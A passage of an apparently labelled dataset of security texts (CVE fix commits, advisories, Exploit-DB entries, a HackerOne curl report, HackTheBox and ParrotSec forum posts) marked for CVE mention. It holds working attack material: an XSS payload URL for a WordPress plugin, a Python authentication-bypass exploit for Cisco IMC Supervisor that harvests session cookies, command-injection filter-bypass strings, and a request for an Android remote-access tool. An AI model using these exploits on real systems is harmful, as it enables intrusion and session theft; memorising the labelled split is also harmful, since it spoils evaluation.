second place). First, during constant folding, the `GraphDef` might not have the required nodes for the binary operation. If a node is missing, the correposning `mul_*child` would be null, and the dereference in the subsequent line would be incorrect. We have a similar issue during `IsIdentityConsumingSwitch`. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Prevent null pointer dereference in constant folding.\n\nUnder certain conditions, an invalid protobuf saved model with invalid nodes would be loaded. During optimization phase, Grappler optimizer will then dereference a null pointer.\n\nPiperOrigin-RevId: 409683530\nChange-Id: I1f10340a7ec384bc9bc587300390f1078cf5caa0", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3023514111bff4fb1af8", "text": "TryHackMe TryHackMe | Cyber Security Training TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!", "source": "parrotsec", "timestamp": "2022-03-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3e4f96419d0e2c0f94b5", "text": "ReDoS based DoS vulnerability in Active Support's underscore\n\n[Severity: LOW]\n\nThere is a possible regular expression based DoS vulnerability in Active Support. This vulnerability has been assigned the CVE identifier CVE-2023-22796.\n\nVersions Affected: All Not affected: None Fixed Versions: 5.2.8.15 (Rails LTS, which is a paid service and not part of the rubygem), 6.1.7.1, 7.0.4.1\nImpact\n\nA specially crafted string passed to the underscore method can cause the regular expression engine to enter a state of catastrophic backtracking. This can cause the process to use large amounts of CPU and memory, leading to a possible DoS vulnerability.\n\nThis affects String#underscore, ActiveSupport::Inflector.underscore, String#titleize, and any other methods using these.\n\nAll users running an affected release should either upgrade or use one of the workarounds immediately.\nReleases\n\nThe FIXED releases are available at the normal locations.\nWorkarounds\n\nThere are no feasible workarounds for this issue.\n\nUsers on Ruby 3.2.0 or greater may be able to reduce the impact by configuring Regexp.timeout.\nPatches\n\nTo aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.\n\n 6-1-Avoid-regex-backtracking-in-Inflector.underscore.patch - Patch for 6.1 series\n 7-0-Avoid-regex-backtracking-in-Inflector.underscore.patch - Patch for 7.0 series\n\nPlease note that only the 7.0.Z and 6.1.Z series are supported at present, and 6.0.Z for severe vulnerabilities. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.", "source": "github_advisory", "timestamp": "2023-01-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c41e4f1ec45bafbfc440", "text": "phpMyAdmin Multiple XSS Vulnerabilities\n\n[Severity: LOW]\n\nMultiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5.x before 3.5.2.2 allow remote authenticated users to inject arbitrary web script or HTML via a Table Operations (1) TRUNCATE or (2) DROP link for a crafted table name, (3) the Add Trigger popup within a Triggers page that references crafted table names, (4) an invalid trigger-creation attempt for a crafted table name, (5) crafted data in a table, or (6) a crafted tooltip label name during GIS data visualization, a different issue than CVE-2012-4345.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4ef955f74c95b54c589f", "text": "Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)\n\n# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)\n# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/\n# Date: 2023-04-24\n# Exploit Author: LEE SE HYOUNG (hackintoanetwork)\n# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/\n# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip\n# Category: Web Application\n# Version: 1.6.7\n# Tested on: Debian / WordPress 6.1.1\n# CVE : CVE-2023-30868\n# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve\n\n# 1. Technical Description:\nThe CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.\nThis is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n\n\n# 2. Proof of Concept (PoC):\n\nWordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)\nIn the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.\n\n1. CMS Tree Page View Plugin <= 1.6.6\n\n a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.\n\n b. your payload will be executed.

[!] note : To make the payload work, the \"In menu\" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.\n\n2. CMS Tree Page View Plugin <= 1.6.7\n\n a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.\n\n b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).\n
[!] note : To make the payload work, the \"In menu\" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.", "source": "exploitdb", "timestamp": "2023-06-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c1d7c3aef4390eeab3af", "text": "HACKING VIA HOSTING PROVIDER.POSSIBLE ?\n\nHello. I am newbie in hacking,pentesting,security.I want to know can some company's (CompanyA) server/servers can be hacked through vulnarable/hacked server/servers of another company(CompanyB) if both these companies hosted on the same hosting provider ? CompanyA and CompanyB are not related to each other. If this possible teoretically then how it can be done ? I would like to know fundamentals of this type of hacking.Thanks.", "source": "go4expert", "timestamp": "2023-07-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e26a4df20ee9ee7e35e3", "text": "There are so much methods as 1, nr.2 There is a www about free education although for most outdated. Want to be a hacker? ok, so learn to be invisible would be your first to worry about which is a whole concept and approach. Then bash (Referred as Linux code but is powershell or Bourne after shell or on win Powershell) and any other code of choice my preference is Python as it apply on all OS types and C but that is more difficult, Linux distributions and common commands you will need many times. Hack The Box, and Privilige Escalation on the 3 OS types like win, XOS and Linux. Believe me that way is long and it is a rabbit hole. Good luck sir. I forgot to mention network basics. In short sir, just download the Hack The Box edition, it is a good introduction and education.", "source": "parrotsec", "timestamp": "2023-11-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4bbdf18a45bd73e7545b", "text": "This was a tough one. Some tips about finding the payload to command inject You can command inject in a GET not just a POST Look at moving a file and see what happens. Some tips I found when you find the file: You can solve this without moving the flag at all. You can read the file without even doing a base64. If you use certain commands from “Blacklisted Command Bypass” you can actually get the command to print out the /flag.txt on the website (ie viewing render in burp to see it easily). While a command from “Blacklisted Command Bypass” may block one command to view files, maybe you can see what other commands aren’t blocked…don’t assume cause bypass is blocked for a command they all are There is a command that isn’t even blocked for reading a file and printing it’s contents. You just need to find it. (but you can still use Blacklisted Command Bypass to use other commands to read contents of a file) You can copy the file if you would rather do that though. You will need to use Blacklisted Command Bypass to get round the copy command.", "source": "hackthebox", "timestamp": "2023-12-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1b1f4d95d9b3c0e6e395", "text": "CVE: CVE-2021-43825\n\n[{'lang': 'en', 'value': 'Envoy is an open source edge and service proxy, designed for cloud-native applications. Sending a locally generated response must stop further processing of request or response data. Envoy tracks the amount of buffered request and response data and aborts the request if the amount of buffered data is over the limit by sending 413 or 500 responses. However when the buffer overflows while response is processed by the filter chain the operation may not be aborted correctly and result in accessing a freed memory block. If this happens Envoy will crash resulting in a denial of service.'}]\n\nFix commit: CVE-2021-43825\n\nResponse filter manager crash\n\nSigned-off-by: Yan Avlasov ", "source": "cvefixes", "timestamp": "2022-02-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "938ba11a4250873fb097", "text": "Unbounded queuing of path validation messages in cloudflare-quiche\n\n[Severity: MEDIUM]\n\n### Impact\nquiche v. 0.15.0 through 0.19.0 was discovered to be vulnerable to unbounded queuing of path validation messages, which could lead to excessive resource consumption.\n\nQUIC path validation ([RFC 9000 Section 8.2](https://datatracker.ietf.org/doc/html/rfc9000#section-8.2)) requires that the recipient of a PATH_CHALLENGE frame responds by sending a PATH_RESPONSE. An unauthenticated remote attacker can exploit the vulnerability by sending PATH_CHALLENGE frames and manipulating the connection (e.g. by restricting the peer's congestion window size) so that PATH_RESPONSE frames can only be sent at the slower rate than they are received, leading to storage of path validation data in an unbounded queue.\n\n### Patches\nQuiche versions greater than 0.19.0 address this problem.\n\n### References\n[CVE-2023-6193](https://www.cve.org/CVERecord?id=CVE-2023-6193)\n[RFC 9000 Section 8.2](https://datatracker.ietf.org/doc/html/rfc9000#section-8.2)", "source": "github_advisory", "timestamp": "2023-12-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7e636571c680248a1c0f", "text": "OpenStack Cinder Denial of Service using XML entities \n\n[Severity: MEDIUM]\n\nThe (1) backup (api/contrib/backups.py) and (2) volume transfer (contrib/volume_transfer.py) APIs in OpenStack Cinder Grizzly 2013.1.3 and earlier allows remote attackers to cause a denial of service (resource consumption and crash) via an XML Entity Expansion (XEE) attack. NOTE: this issue is due to an incomplete fix for CVE-2013-1664.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "042eb43a1ded7b40fd5c", "text": "[Missing Encryption of Sensitive Data] CVE-2023-46219: HSTS long file name clears contents\n\n## Summary:\nI've discovered a significant security flaw in cURL's file handling, particularly affecting the HSTS (HTTP Strict Transport Security) database when handling long filenames. \n\n### Vulnerability Description\ncURL erroneously creates temporary files with names potentially exceeding the filesystem's maximum filename length (typically 255 bytes for ext4, etc.). If a filename used in the HSTS database is longer than 243 bytes (255 bytes minus 9 for the random suffix and 4 for the '.tmp' extension), an unexpected security error occurs, leading to the HSTS database being overwritten.\n\n### Affected Code\n\n**File: curl/lib/fopen.c**\n```c\nCURLcode Curl_fopen(struct Curl_easy *data, const char *filename, FILE **fh, char **tempname) {\n CURLcode result = CURLE_WRITE_ERROR;\n unsigned char randsuffix[9]; // Random suffix generation <=======\n ...\n tempstore = aprintf(\"%s.%s.tmp\", filename, randsuffix); // Temporary filename creation <=======\n if(!tempstore) {\n result = CURLE_OUT_OF_MEMORY;\n goto fail;\n }\n}\n```\n\n**File: curl/lib/hsts.c**\n```c\nresult = Curl_fopen(data, file, &out, &tempstore);\n...\nif(!result && tempstore && Curl_rename(tempstore, file)) // Attempt to rename temp file to actual file <======\n result = CURLE_WRITE_ERROR;\n\nif(result && tempstore)\n unlink(tempstore); // Remove temp file if error occurs\n```\n\n## Steps To Reproduce:\n\n\nFirst let’s check the correct behaviour. I’ve created simple hsts file for cxsecurity.com domain\n```bash\n$ cat ok.hsts.txt\n# Your HSTS cache. https://curl.se/docs/hsts.html\n# This file was generated by libcurl! Edit at your own risk.\ncxsecurity.com \"20241031 12:12:12\"\n \n$ curl --hsts ok.hsts.txt http://cxsecurity.com -v\n* Switched from HTTP to HTTPS due to HSTS => https://cxsecurity.com/\n* Trying 188.114.97.1:443...\n…
\n```\n\nSo works great. Let’s try update the database and add Facebook \n \n```bash\n$ curl --hsts ok.hsts.txt https://facebook.com -v \n* Trying 31…\n* Connected to facebook.com …\n…\n< Strict-Transport-Security: max-age=15552000; preload\n…\n \n$ cat ok.hsts.txt \n# Your HSTS cache. https://curl.se/docs/hsts.html\n# This file was generated by libcurl! Edit at your own risk.\ncxsecurity.com \"20241031 12:12:12\"\nfacebook.com \"20240430 00:11:44\"\n```\n\nThe file has been successfully updated. 
\n\nLet’s see what will happen if the user will define filename longer that 243 (let’s use the content from previous file)\n\n```bash\n$ cp ok.hsts.txt hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.txt \n```\n\nLet’s validate the file size as it will be important to prove security issue. \n\n```bash\n$ ls -la hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.txt \n-rw-r--r-- 1 cx cx 179 Nov 1 19:14 hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.txt\n```\n\nwe have 179 bytes.\n\nIf the user will use such file, curl will reset the content due to improper rename action\n\n```bash\n$ cat hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.hsts.h", "source": "hackerone", "timestamp": "2023-12-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b9e5386eedd4ca8f94fe", "text": "Hey, I;ve just got flag5. if you got flag4, the way to flag5 is not hard, but tricky.", "source": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5c58ae26d074dd1a63af", "text": "Cobbler is vulnerable to code injection \n\n[Severity: HIGH]\n\ntemplate_api.py in Cobbler before 2.0.7, as used in Red Hat Network Satellite Server and other products, does not disable the ability of the Cheetah template engine to execute Python statements contained in templates, which allows remote authenticated administrators to execute arbitrary code via a crafted kickstart template file, a different vulnerability than CVE-2008-6954.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "38cce2fd9f0597fd944c", "text": "Can someone please give me a nudge with the Question 1 Predictable Reset Token please. I’ve adjusted the original reset_token_time.py script for this question, as shown in a post in this thread. I understand what everything is doing (start_time, endtime, now) etc but I still can’t get a valid token for htbadmin. I click the “Create reset token” button, which gives me a token and displays a time below it. I take this time and and convert it to epoch time (in milliseconds) then I enter this as my now value in the python script. I run the python script and enter the resulting generated code into “validate token” but it’s always wrong. I’m using +/- 1000 for the endtime and start_time values as suggested in the question. I just can’t think what the issue can be on this. Ta", "source": "hackthebox", "timestamp": "2022-05-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "50c030e04ee24e3681b0", "text": "CVE: CVE-2022-23559\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can craft a TFLite model that would cause an integer overflow in embedding lookup operations. Both `embedding_size` and `lookup_size` are products of values provided by the user. Hence, a malicious user could trigger overflows in the multiplication. In certain scenarios, this can then result in heap OOB read/write. Users are advised to upgrade to a patched version.'}]\n\nFix commit: Prevent segfault in `embedding_lookup_sparse.cc`\n\nPrevious fixes missed one additional case.\n\nPiperOrigin-RevId: 417676944\nChange-Id: I8ab412155cf9b1e897448a6611d209eaa7ca9e66", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5aa944ec721c0e98696e", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nThe Chakra JavaScript scripting engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-7200, CVE-2016-7201, CVE-2016-7202, CVE-2016-7203, CVE-2016-7208, CVE-2016-7242, and CVE-2016-7243.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9626eb47520f442e114f", "text": "Use the base64 encoded payload shown in the module to read the flag echo -n 'cat /flag.txt' | base64 You need to substitute / with something else (from previous modules ${PA…} in the above command. You can take that output and inject it using the below method: ‘bash<<<…’ In the URL after to= make sure you substitute characters for spaces and || or & as well. Once you insert the right payload use the move option to display the flag.", "source": "hackthebox", "timestamp": "2023-04-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "382fec44281e3b5a3250", "text": "Can someone help me? i´ve been stuck in here for some days now… I get the ‘malicious request denied’ message, and then i’ve tried several commands and none of them worked for me, This were some of the commands i used: ${LS_COLORS:10:1}${PATH:0:1}flag.txt echo -n ‘cat /flag.txt’ | base64 ${LS_COLORS:10:1}bash<<<$(base64<<<-dY2F0IC9mbGFnLnR4dA==) ${LS_COLORS:10:1}bash<<<$(rev<<<‘txt.galf%2F%09tac’) ${LS_COLORS:10:1}c’a’t’${PATH:0:1}fl’a’g.txt Appreciate all the help i can get. Thanks in advance.", "source": "hackthebox", "timestamp": "2022-06-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "47307c0c18eee629a197", "text": "CVE: CVE-2022-23584\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a use after free behavior when decoding PNG images. After `png::CommonFreeDecode(&decode)` gets called, the values of `decode.width` and `decode.height` are in an unspecified state. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Prevent use after free in `DecodePng` kernel.\n\nWe are cleaning up the memory in `decode` and then we are using an `OP_REQUIRES` to check an invariant on the `decode` data.\n\nPiperOrigin-RevId: 409299145\nChange-Id: I4eb93aaca52483eb202e89b78df07fbb2f6cb254", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ac88c2bdbd48fd5af085", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8354, CVE-2018-8391, CVE-2018-8457, CVE-2018-8459.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0bb2419fc8503cc890a7", "text": "Apache Tomcat - Fix for CVE-2023-24998 was incomplete\n\n[Severity: HIGH]\n\nThe fix for CVE-2023-24998 was incomplete. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.", "source": "github_advisory", "timestamp": "2023-07-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "de7f6869cf5937e2362e", "text": "Has someone used the logrotten exploit in this module? I am having lot of trouble executing the payload and I dont know what am I doing wrong", "source": "hackthebox", "timestamp": "2023-07-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2fe9bbd8bd1809129134", "text": "Hello my brothers and sisters. I am completely lost on the this wireshrak-lab2. I cannot connect to target IP. By reading the comments I see im supposed ot connect to NOMACHINE which is not in the instructions. tried doing that and nothing happens, says it not configured or something of that nature. I could really use some help.", "source": "hackthebox", "timestamp": "2023-12-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "480b9707c1aeafc815f5", "text": "CVE: CVE-2022-0520\n\n[{'lang': 'en', 'value': 'Use After Free in NPM radare2.js prior to 5.6.2.'}]\n\nFix commit: Fix bins/*/rep8 - UAF crash in pyc parser ##crash\n\n* Reported by Cen Zhang via huntr.dev", "source": "cvefixes", "timestamp": "2022-02-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8d584e2e18fd0ad021b5", "text": "The very last question regarding the “other user” in conjuction with RockYou-30. This question has been an issue for quite some people here…", "source": "hackthebox", "timestamp": "2022-02-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "02d6ded99d283b494b06", "text": "CVE: CVE-2022-31117\n\n[{'lang': 'en', 'value': 'UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. In versions prior to 5.4.0 an error occurring while reallocating a buffer for string decoding can cause the buffer to get freed twice. Due to how UltraJSON uses the internal decoder, this double free is impossible to trigger from Python. This issue has been resolved in version 5.4.0 and all users should upgrade to UltraJSON 5.4.0. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-fm67-cv37-96ff\n\nFix double free on string decoding if realloc fails", "source": "cvefixes", "timestamp": "2022-07-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9ecddec39da32b911f61", "text": "dio vulnerable to CRLF injection with HTTP method string\n\n[Severity: HIGH]\n\n### Impact\nThe dio package 4.0.0 for Dart allows CRLF injection if the attacker controls the HTTP method string, a different vulnerability than CVE-2020-35669.\n\n### Patches\nThe vulnerability has been resolved by https://github.com/cfug/dio/commit/927f79e93ba39f3c3a12c190624a55653d577984, and included since v5.0.0.\n\n### Workarounds\nCherry-pick the commit to your own fork can resolves the vulberability too.\n\n### References\n- https://nvd.nist.gov/vuln/detail/CVE-2021-31402\n- https://osv.dev/GHSA-jwpw-q68h-r678\n- https://github.com/cfug/dio/issues/1130\n- https://github.com/cfug/dio/issues/1752\n", "source": "github_advisory", "timestamp": "2023-03-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7191aa342cf789de9f40", "text": "I didn’t find a correct solution, but read the flag using the ‘-b’ switch for a server script that uses ‘mv’. Hack the planet haha Ok.Got it. little hint, not directly solution: ‘((ob))’, yes, I know, but it’s not you think it is. Change something and fill in between the brackets and be sure to use money for it.", "source": "hackthebox", "timestamp": "2023-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "29d03bff9146f160e8a5", "text": "@qatarairways , Parrot Security has a handful of tools that may help you in this case, try: nmap dmitry whatweb nikto", "source": "parrotsec", "timestamp": "2022-02-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9fdc11ff5a6e8abea89f", "text": "Am I supposed to be looking in the packet details tab for a username? I have filtered through different protocols and nothing looks obvious to me.", "source": "hackthebox", "timestamp": "2023-09-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0d03368c77c93731785d", "text": "CVE: CVE-2022-0928\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.2.12.'}]\n\nFix commit: upgrade taxes to laravel routers", "source": "cvefixes", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "74d0b832c96f148419f7", "text": "With some tips I managed to get this question after some hard thinking! If anyone needs a nudge in the right direction feel free to DM me", "source": "hackthebox", "timestamp": "2023-02-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "47343d4da7c54d3380a9", "text": "Farial_Mahmod: Have you tried sudo apt install firefox ? FYI mainline firefox has been removed from debian few months ago, and to install through repo, only the ESR version is available Or else the latest version should be downloaded from snap.", "source": "parrotsec", "timestamp": "2022-02-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6f0c2b94bf0fcd20d277", "text": "CVE: CVE-2022-24722\n\n[{'lang': 'en', 'value': 'VIewComponent is a framework for building view components in Ruby on Rails. Versions prior to 2.31.2 and 2.49.1 contain a cross-site scripting vulnerability that has the potential to impact anyone using translations with the view_component gem. Data received via user input and passed as an interpolation argument to the `translate` method is not properly sanitized before display. Versions 2.31.2 and 2.49.1 have been released and fully mitigate the vulnerability. As a workaround, avoid passing user input to the `translate` function, or sanitize the inputs before passing them.'}]\n\nFix commit: Fix XSS vulnerability when using HTML-safe translations and interpolation arguments (#1295)", "source": "cvefixes", "timestamp": "2022-03-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fbf110145a98c707b196", "text": "Looking for Android Rat\n\nHi guys which one remote access tool you could recommend to control android 10/11/12? With Gui Free/Paid. At this moment I test Ahmyth rat from github, but there is no lots of options to control android and it’s little buggy as I tested on my two mobiles. Maybe you guys know some good ra/tools which are interesting and I could check. Thanks.", "source": "parrotsec", "timestamp": "2022-01-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "cae2409452ade3e3861e", "text": "Insecure Temporary File in Jinja2\n\n[Severity: MEDIUM]\n\nFileSystemBytecodeCache in Jinja2 prior to version 2.7.2 does not properly create temporary directories, which allows local users to gain privileges by pre-creating a temporary directory with a user's uid. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-1402.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "97aebfa479f0da06290c", "text": "CVE: CVE-2022-28368\n\n[{'lang': 'en', 'value': 'Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).'}]\n\nFix commit: Match installed font filename extension to type\n\nfixes #2598", "source": "cvefixes", "timestamp": "2022-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9c5172cc4d454cfcdebb", "text": "Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass\n\n[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass\n[+] Cisco IMC Supervisor - < 2.2.1.0\n[+] Date: 08/21/2019\n[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo\n[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html\n[+] Vulnerability Discovery : Pedro Ribeiro\n[+] Exploit Author: Fatih Sencer\n[+] CVE: CVE-2019-1937\n----------------------------------------------------\n\nUsage:\n\n./python3 CiscoIMC-Bypass.py -u host\n\n[+] Target https://xxxxxx.com\n[+] Target OK\n[+] Exploit Succes\n[+] Login name : admin\n[+] Cookie : REACTED\n\n\"\"\"\n\nimport argparse,requests,warnings,base64,json,random,string\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nwarnings.simplefilter('ignore',InsecureRequestWarning)\n\n\ndef init():\n parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')\n parser.add_argument('-u','--host',help='Host', type=str, required=True)\n args = parser.parse_args()\n exploit(args)\n\ndef exploit(args):\n session = requests.Session()\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": \"https://{}/\".format(args.host),\n \"X-Starship-UserSession-Key\": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),\n \"X-Starship-Request-Key\": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))\n }\n target = \"https://{}/app/ui/ClientServlet?apiName=GetUserInfo\".format(args.host)\n print(\"[+] Target {}\".format(args.host))\n\n exp_send = session.get(target, headers=headers, verify=False, timeout=10)\n\n if exp_send.status_code == 200:\n print(\"[+] Target OK\")\n body_data = json.loads(exp_send.text)\n if not (body_data.get('loginName') is None):\n print(\"[+] Exploit Succes\")\n print(\"[+] Login name : {}\".format(body_data.get('loginName')))\n print(\"[+] Cookie : {}\".format(session.cookies.get_dict()))\n else:\n print(\"[-] Exploit Failed\")\n\n else:\n print(\"[-] N/A\")\n exit()\n\nif __name__ == \"__main__\":\n init()", "source": "exploitdb", "timestamp": "2023-07-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "effaf183c34b439e623a", "text": "CVE: CVE-2022-24737\n\n[{'lang': 'en', 'value': 'HTTPie is a command-line HTTP client. HTTPie has the practical concept of sessions, which help users to persistently store some of the state that belongs to the outgoing requests and incoming responses on the disk for further usage. Before 3.1.0, HTTPie didn‘t distinguish between cookies and hosts they belonged. This behavior resulted in the exposure of some cookies when there are redirects originating from the actual host to a third party website. Users are advised to upgrade. There are no known workarounds.'}]\n\nFix commit: Implement new style cookies", "source": "cvefixes", "timestamp": "2022-03-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6e26abbb4200b1a59430", "text": "CVE: CVE-2022-31002\n\n[{'lang': 'en', 'value': 'Sofia-SIP is an open-source Session Initiation Protocol (SIP) User-Agent library. Prior to version 1.13.8, an attacker can send a message with evil sdp to FreeSWITCH, which may cause a crash. This type of crash may be caused by a URL ending with `%`. Version 1.13.8 contains a patch for this issue.'}]\n\nFix commit: Merge pull request from GHSA-g3x6-p824-x6hm\n\nFix Out-of-bound read in url_canonize2 and url_canonize3", "source": "cvefixes", "timestamp": "2022-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "317797119b80b988f2a7", "text": "Hi Sam, I don’t understand what you are accusing “someone here” of doing. Parrot community moderators have no access to anything except approving posts respecting guidelines. All posts here are moderated by at least 4 members and any Parrot Devs who might visit here.", "source": "parrotsec", "timestamp": "2023-11-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": 